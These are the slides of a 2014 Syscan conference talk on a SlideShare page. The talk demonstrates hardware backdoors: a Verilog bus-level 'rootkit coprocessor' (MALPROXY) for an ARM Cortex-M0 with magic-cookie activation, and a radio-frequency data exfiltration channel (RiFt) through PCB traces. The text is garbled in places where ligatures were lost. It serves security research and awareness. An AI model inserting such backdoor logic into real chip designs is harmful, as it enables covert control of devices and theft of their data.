Introduction 
MALPROXY 
RiFt: Ex
ltration 
Deep-Submicron Backdoor 
Syscan Singapore 2014 
Alfredo Ortega 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Agenda 
Deep-Submicron VLSI: Technology smaller than 350nm 
Har...
ltration backdoor (Demo) 
Questions 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Introduction 
Hardware": overused 
Not Hardware: 
Regular user-...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Hardware" backdoors? 
Still in software/
rmware 
Specially dangerous if massive (adversary can 
use them) 
More expensive to detect (No AVs) 
Software 
User−mode 
...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
History 
The Great Seal Bug 
Also called The Thing" 
one of the
rst covert 
listening devices (Found in 
1945) 
Designed by Leon Theremin 
Sound-modulated resonant 
cavity: No external p...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Clipper chip 
Clipper chip 
Developed and promoted by 
the U.S....
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
NSA Ant division Catalog 
NSA ANT Insert catalog 
Catalog of ha...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Non-gov examples (Legit backdoors) 
Intel Anti-theft tech 
Netw...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Unintentional backdoors 
World-accesible re
ashing mechanisms 
...
rmware-backdoors 
Silicon-PROASIC3 backdoor 
(Skorobogatov Et. Al.) 
JTAG-interfaces 
Convenience/Security tradeo 
Groundw...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Agenda 
Introduction 
History 
Non-gov examples 
Rationale 
No real backdoor on silicon to analyze, 
all theoret...
ltration (RiFt) 
R i Ft 
MAL PROXY 
Groundworks Technologies Deep-Submicron Backdoor
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY 
3 
4 
7 
1 
2 
13 
12 
11 
10 
9 
15 
Malicious B...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY 
High-level Design 
Constantly monitoring the AMBA...
Introduction 
MALPROXY 
RiFt: Ex
ltration 
Introduction 
High-level design 
Logic 
ASIC 
Usage 
MALPROXY: Verilog 
1 // -----------------------------------...
Próxima SlideShare
Cargando en…5
×

Deep submicron-backdoors-ortega-syscan-2014-slides

4.794 visualizaciones

Publicado el

Malicious hardware is a mature topic but previous research has focused almost exclusively on theoretical applications. In this article, practical implementations of gate-level backdoors will be presented using the Verilog hardware description language, then simulated and finally synthesized using freely available deep sub-micron (45-180 nm) standard cells, resulting in a backdoored latest-generation ARM CPU, suitable for fabrication and massive deployment.

Publicado en: Ciencias
0 comentarios
3 recomendaciones
Estadísticas
Notas
  • Sé el primero en comentar

Sin descargas
Visualizaciones
Visualizaciones totales
4.794
En SlideShare
0
De insertados
0
Número de insertados
33
Acciones
Compartido
0
Descargas
23
Comentarios
0
Recomendaciones
3
Insertados 0
No insertados

No hay notas en la diapositiva.

Deep submicron-backdoors-ortega-syscan-2014-slides

  1. 1. Introduction MALPROXY RiFt: Ex
  2. 2. ltration Deep-Submicron Backdoor Syscan Singapore 2014 Alfredo Ortega Groundworks Technologies Deep-Submicron Backdoor
  3. 3. Introduction MALPROXY RiFt: Ex
  4. 4. ltration Agenda Introduction History Non-gov examples Agenda Deep-Submicron VLSI: Technology smaller than 350nm Hardware Backdoors History Non-Gov examples Unintentional backdoors Why create a CPU backdoor Malproxy BUS backdoor (Demo) RFI Ex
  5. 5. ltration backdoor (Demo) Questions Groundworks Technologies Deep-Submicron Backdoor
  6. 6. Introduction MALPROXY RiFt: Ex
  7. 7. ltration Agenda Introduction History Non-gov examples Introduction Hardware": overused Not Hardware: Regular user-mode backdoors - Re ections on Trusting Trust" Weakening of protocols/cryptography (See RSA Dual EC DRBG saga) Very practical Particularly dangerous Easy to catch Software User−mode Kernel−mode Hypervisor Firmware Microcode Physics Regular Rootkits Hardware Groundworks Technologies Deep-Submicron Backdoor
  8. 8. Introduction MALPROXY RiFt: Ex
  9. 9. ltration Agenda Introduction History Non-gov examples Hardware" backdoors? Still in software/
  10. 10. rmware Specially dangerous if massive (adversary can use them) More expensive to detect (No AVs) Software User−mode Kernel−mode Hypervisor Firmware Microcode Physics Regular Rootkits Bios Rootkits SMM Rootkits AMT Rootkits Hardware Our talk Groundworks Technologies Deep-Submicron Backdoor
  11. 11. Introduction MALPROXY RiFt: Ex
  12. 12. ltration Agenda Introduction History Non-gov examples History The Great Seal Bug Also called The Thing" one of the
  13. 13. rst covert listening devices (Found in 1945) Designed by Leon Theremin Sound-modulated resonant cavity: No external power. Groundworks Technologies Deep-Submicron Backdoor
  14. 14. Introduction MALPROXY RiFt: Ex
  15. 15. ltration Agenda Introduction History Non-gov examples Clipper chip Clipper chip Developed and promoted by the U.S. NSA Announced in 1993 Skipjack algorithm - Key escrow mechanism Cryptographer Matt Blaze published a serious vulnerability. Entirely defunct by 1996 Groundworks Technologies Deep-Submicron Backdoor
  16. 16. Introduction MALPROXY RiFt: Ex
  17. 17. ltration Agenda Introduction History Non-gov examples NSA Ant division Catalog NSA ANT Insert catalog Catalog of hardware backdoors Developed from 2005 to 2010 Leaked by Edward Snowden Groundworks Technologies Deep-Submicron Backdoor
  18. 18. Introduction MALPROXY RiFt: Ex
  19. 19. ltration Agenda Introduction History Non-gov examples Non-gov examples (Legit backdoors) Intel Anti-theft tech Network equipment lawful interception Research and Academia: IEEE Hardware-Oriented Security and Trust (HOST) NYU-Poly Embedded-System Challenge Too many to cite. Very advanced. Stealthy Dopant-Level Hardware Trojans Becker Et. Al. Groundworks Technologies Deep-Submicron Backdoor
  20. 20. Introduction MALPROXY RiFt: Ex
  21. 21. ltration Agenda Introduction History Non-gov examples Unintentional backdoors World-accesible re ashing mechanisms (BIOS,micro-sd, pendrives, etc.) Most
  22. 22. rmware-backdoors Silicon-PROASIC3 backdoor (Skorobogatov Et. Al.) JTAG-interfaces Convenience/Security tradeo Groundworks Technologies Deep-Submicron Backdoor
  23. 23. Introduction MALPROXY RiFt: Ex
  24. 24. ltration Agenda Introduction History Non-gov examples Rationale No real backdoor on silicon to analyze, all theoretical examples. Let's make a real one. Our approach: Real silicon ASIC design Generic and simple payload trivial to locate. No eort on stealth. Ready for massive deployment Two basic attacks: 1 Bus-intrusion (MALPROXY) 2 data-ex
  25. 25. ltration (RiFt) R i Ft MAL PROXY Groundworks Technologies Deep-Submicron Backdoor
  26. 26. Introduction MALPROXY RiFt: Ex
  27. 27. ltration Introduction High-level design Logic ASIC Usage MALPROXY 3 4 7 1 2 13 12 11 10 9 15 Malicious Bus Proxy RAM BUS CPU 5 6 14 MALPROXY Bus backdoor Small malicious state-machine Peek/Poke functionality AMBA-compatible CPU/Software independent Real system (ARM Cortex-M0 DesignStart) FPGA and silicon-ready Easy to detect Groundworks Technologies Deep-Submicron Backdoor
  28. 28. Introduction MALPROXY RiFt: Ex
  29. 29. ltration Introduction High-level design Logic ASIC Usage MALPROXY High-level Design Constantly monitoring the AMBA bus. If command correctly parsed, take control of the bus and modify memory. Only two commands needed for execution control: Peek mem32 Poke mem32 If software/arch is known, only Poke command is enough. Search activation cookie Read command Read address Read data Execute command Groundworks Technologies Deep-Submicron Backdoor
  30. 30. Introduction MALPROXY RiFt: Ex
  31. 31. ltration Introduction High-level design Logic ASIC Usage MALPROXY: Verilog 1 // ------------------------------------------------- 2 // Trivial rootkit coprocessor unit 3 // ------------------------------------------------- 4 reg [5:0] RTKState ; 5 reg [8:0] RTKCmd ; 6 7 reg [3:0] RTKCount ; 8 `define RTK_FIND_START 5'h0 9 `define RTK_FIND_CMD 5'h1 10 `define RTK_FIND_DATA 5'h2 11 `define RTK_FIND_ADDR 5'h3 12 `define RTK_EXEC 5'h4 13 `define RTK_EXEC2 5'h5 14 `define RTK_END 5'h6 15 `define RTK_CMD_WRITE W 16 `define RTK_CMD_READ R 17 18 // 56 - bit initial cookie 19 // I.E. memcpy x78 x56 x34 x12R xaa x55 xaa ; 20 `define RTK_COOKIE_1 32' h12345678 21 `define RTK_COOKIE_2 24' h434241 22 `define RTK_COOKIE_3 24' h2D2D2D // --- 1 always @( posedge HCLK or posedge HRESETn ) 2 begin 3 if (! HRESETn ) // Reset 4 begin 5 RTKState = `RTK_FIND_START ; 6 RTKDeviated =0; 7 end 8 else begin 9 case ( RTKState ) 10 `RTK_FIND_START : // Find first part of cookie 11 if ( HWDATA == `RTK_COOKIE_1 ) 12 begin 13 RTKState = `RTK_FIND_CMD ; 14 end 15 `RTK_FIND_CMD : // Load second part of cookie and 16 begin // single - byte command 17 if ( HWDATA [31:8] == `RTK_COOKIE_2 ) 18 begin 19 RTKCmd = HWDATA [7:0]; 20 RTKState = `RTK_FIND_DATA ; 21 RTKCount =0; 22 end 23 else RTKState = `RTK_FIND_START ; 24 end Groundworks Technologies Deep-Submicron Backdoor
  32. 32. Introduction MALPROXY RiFt: Ex
  33. 33. ltration Introduction High-level design Logic ASIC Usage MALPROXY: Logic Malproxy 180nm, 100 Mhz: 476 Cells 1.032 mW 0.019 mm2 Total (with Cortex M0): 9526 Cells 14.7 mW 0.38 mm2 Logic diagram (incomplete) Groundworks Technologies Deep-Submicron Backdoor
  34. 34. Introduction MALPROXY RiFt: Ex
  35. 35. ltration Introduction High-level design Logic ASIC Usage MALPROXY: ASIC Implementation: ARM AMBA-bus compatible 100% Verilog FPGA+ASIC compatible Two process: OSU TSMC 180nm6-layer Nangate 45nm10-layer https://github.com/Groundworkstech/ Submicron (ARM core requires separate license) Placed and Routed, ARM + MalProxy, 180nm 6 metal layers Groundworks Technologies Deep-Submicron Backdoor
  36. 36. Introduction MALPROXY RiFt: Ex
  37. 37. ltration Introduction High-level design Logic ASIC Usage MALPROXY Demo 1: 45 nm 10-Layer structure Groundworks Technologies Deep-Submicron Backdoor
  38. 38. Introduction MALPROXY RiFt: Ex
  39. 39. ltration Introduction High-level design Logic ASIC Usage MALPROXY 45-nm 10-layer SOC Encounter Digital ow (Cadence) GDSII output Visible code style dierences Groundworks Technologies Deep-Submicron Backdoor
  40. 40. Introduction MALPROXY RiFt: Ex
  41. 41. ltration Introduction High-level design Logic ASIC Usage MALPROXY Command encoding: `define RTK_COOKIE_1 32'h12345678 `define RTK_COOKIE_2 24'h434241 `define RTK_COOKIE_3 24'h2D2D2D `define RTK_CMD_WRITE W `define RTK_CMD_READ R ------32 bits ------- - [RTK_COOKIE_1] - [RTK_COOKIE_2 + Command] - [RTK_COOKIE_3 + DATA]*4 - [RTK_COOKIE_3 + ADDR]*4 - [RTK_COOKIE_3 + EXEC] : Executes Command EXEC disconnects the CPU from the BUS and CLK for 2 clocks total. Groundworks Technologies Deep-Submicron Backdoor
  42. 42. Introduction MALPROXY RiFt: Ex
  43. 43. ltration Introduction High-level design Logic ASIC Usage MALPROXY:Activation Example activation code (*): 1 char buf [40]; 2 char * str= x78 x56 x34 x12WABCA ---A---A---A---x00 ---x00 ---x0a ---x65 ---; 3 while ( TRUE ) { 4 puts ( Main thread : hello world ); 5 memcpy (buf ,str ,40); -- Backdoor activates here 6 chSchDoRescheduleBehind (); 7 } (*) Activation can be triggered by any other means, e.g. network transfer, DMA, etc. Groundworks Technologies Deep-Submicron Backdoor
  44. 44. Introduction MALPROXY RiFt: Ex
  45. 45. ltration Introduction High-level design Logic ASIC Usage MALPROXY Demo 2: Backdoor activation Groundworks Technologies Deep-Submicron Backdoor
  46. 46. Introduction MALPROXY RiFt: Ex
  47. 47. ltration Introduction Simulation Measurements End RiFt: Data ex
  48. 48. ltration We are not limited by standard communication (TCP/IP, etc) Many side-channels are available. We chose forced RFI using PCB traces Even LED traces can be used Target: Altera DE1 FPGA dev-board Reception with RTL-SDR, up to 5 meters with standard receiver antenna DE1 PCB Groundworks Technologies Deep-Submicron Backdoor
  49. 49. Introduction MALPROXY RiFt: Ex
  50. 50. ltration Introduction Simulation Measurements End RiFt: Harmonics How it works? CPUs and FPGAs usually can't emit RF directly. They can switch a pin on/o very fast (100 Mhz) This produces a square wave with in
  51. 51. nite sinusoidal harmonics We can use any of those harmonic frequencies For now, just simple modulation (AM, on/o) Groundworks Technologies Deep-Submicron Backdoor
  52. 52. Introduction MALPROXY RiFt: Ex
  53. 53. ltration Introduction Simulation Measurements End RiFt: Harmonics Groundworks Technologies Deep-Submicron Backdoor
  54. 54. Introduction MALPROXY RiFt: Ex
  55. 55. ltration Introduction Simulation Measurements End RiFt: Simulation Numerical Electromagnetic Codes (xnec2c): Gain vs Freq / 3d Radiation pattern Groundworks Technologies Deep-Submicron Backdoor
  56. 56. Introduction MALPROXY RiFt: Ex
  57. 57. ltration Introduction Simulation Measurements End RiFt: Simulation Numerical Electromagnetic Codes (xnec2c), data
  58. 58. le: CM NEC Input File CM Monopole radius 0.001m, lenght 17m above perfect ground CM Monopole pcb trace 0.0001m, lenght 17m above perfect ground CM Excitation at base by a 1V source CM GW 9 , 8, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00800E+00, 0.00000E+00, 1.00000E-03 CM Antenna geometry CE GW 1 , 8, 0.00000E+00, 0.00000E+00, 0.00100E+00, 0.10000E+00, 0.00000E+00, 0.00100E+00, 1.00000E-03 GW 2 , 8, 0.00000E+00, 0.00100E+00, 0.00100E+00, 0.10000E+00, 0.01000E+00, 0.00100E+00, 1.00000E-03 GW 3 , 8, 0.00000E+00, 0.00200E+00, 0.00100E+00, 0.10000E+00, 0.02000E+00, 0.00100E+00, 1.00000E-03 GW 4 , 8, 0.00000E+00, 0.00300E+00, 0.00100E+00, 0.10000E+00, 0.03000E+00, 0.00100E+00, 1.00000E-03 GW 5 , 8, 0.00000E+00, 0.00400E+00, 0.00100E+00, 0.10000E+00, 0.04000E+00, 0.00100E+00, 1.00000E-03 GW 6 , 8, 0.00000E+00, 0.00500E+00, 0.00100E+00, 0.10000E+00, 0.05000E+00, 0.00100E+00, 1.00000E-03 GW 7 , 8, 0.00000E+00, 0.00600E+00, 0.00100E+00, 0.10000E+00, 0.06000E+00, 0.00100E+00, 1.00000E-03 GW 8 , 8, 0.00000E+00, 0.00700E+00, 0.00100E+00, 0.10000E+00, 0.07000E+00, 0.00100E+00, 1.00000E-03 GE FR 0, 1000, 0,0, 100, 1 EX 0 1 1 10 1 RP 0, 19, 36, 1000, 0, 0, 10, 10 EN 0 , 0 , 0 0 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 Groundworks Technologies Deep-Submicron Backdoor
  59. 59. Introduction MALPROXY RiFt: Ex
  60. 60. ltration Introduction Simulation Measurements End RiFt: Demo Demo 3: Antenna simulation Groundworks Technologies Deep-Submicron Backdoor
  61. 61. Introduction MALPROXY RiFt: Ex
  62. 62. ltration Introduction Simulation Measurements End RiFt: Measurements Measurements: Setup Groundworks Technologies Deep-Submicron Backdoor
  63. 63. Introduction MALPROXY RiFt: Ex
  64. 64. ltration Introduction Simulation Measurements End RiFt: Measurements Measurements results 40 30 20 10 0 10 20 30 40 700 Mhz RiFt power measurement 0 10 20 30 40 40 30 20 10 0 10 20 30 40 dBSM Azimuth - using 1:($3-$2) Groundworks Technologies Deep-Submicron Backdoor
  65. 65. Introduction MALPROXY RiFt: Ex
  66. 66. ltration Introduction Simulation Measurements End RiFt: Directionality DE1 board LED 1-8 PCB traces at 700 Mhz, order is 1,3,2,4,7,8: Parasitic antenna array showing Yagi-like directionality Groundworks Technologies Deep-Submicron Backdoor
  67. 67. Introduction MALPROXY RiFt: Ex
  68. 68. ltration Introduction Simulation Measurements End RiFt Demo 4: RiFt in action! Groundworks Technologies Deep-Submicron Backdoor
  69. 69. Introduction MALPROXY RiFt: Ex
  70. 70. ltration Introduction Simulation Measurements End The end Thanks! Any question? Deep-Submicron Backdoor project was created by researchers Fernando Russ and Alfredo Ortega (Twitter: @ortegaalfredo ) from Groundworks Technologies Buenos Aires, Argentina Groundworks Technologies Deep-Submicron Backdoor

×